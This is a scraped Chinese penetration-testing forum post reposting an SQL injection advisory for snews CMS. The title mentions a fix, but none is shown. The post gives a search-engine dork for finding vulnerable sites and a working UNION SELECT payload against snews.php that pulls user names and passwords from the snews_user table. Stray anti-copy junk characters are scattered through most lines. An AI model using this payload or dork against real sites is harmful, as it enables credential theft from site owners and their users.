找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 CMS snews SQL注射及修复
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1893|回复: 0
打印 上一主题 下一主题

CMS snews SQL注射及修复

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 08:55:06 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
标题: CMS snews SQL Injection Vulnerability
' n# L9 T( c( f7 q" B# v作者: By onestree
% S# ]# d( M, r) H8 L% h下载地址 : http://snewscms.com/
( x" a" b& B! }8 W+ O测试平台 : ubuntu 12.10 / win 7
/ f! I: p5 U: r关键词: inurl:"tanyakan pada rumput yang bergoyang"! r* S. e/ u" Q* {; `

" T2 h$ i6 z6 j# ^% N9 g+ A2 g
0 ~8 N( I# _: I' ~*************************************************************
+ G; o' E2 v2 b # E$ D( ?1 ~3 j4 g) l! t
SQL poc:
' f4 I% o- H& ?# f ( G3 p& }5 s8 G+ h9 q  |
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
. F4 F) |; l" J0 `. S : q1 A) T& ]& ?3 p6 w0 e2 V
示例( r. m* G  I1 u4 E( }# N7 t  C' f+ G" ]

0 h3 r; Z2 F/ l$ r3 c0 }http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*& e0 ~6 Q; H+ E" C! G* x

5 |' n& W5 V5 H1 \8 L: p2 d# c3 T
" V0 |" B5 A  {: I7 s; @致谢:
: E  G9 N% e+ _, G3 B 7 h& R5 y( w2 j- n8 x1 d
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
" Q% f. K1 \' Y4 n6 w: o- I2 ]     / f/ ^# v- Q5 t, b7 v0 W
          indonesiancoder - moeslimh4x0r - go-coder
( M" L3 p5 V" f; v$ `9 y0 L
* V5 S, M/ D( U8 V  lspesial my hunny :*6 U* o6 e/ |% [+ v/ t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表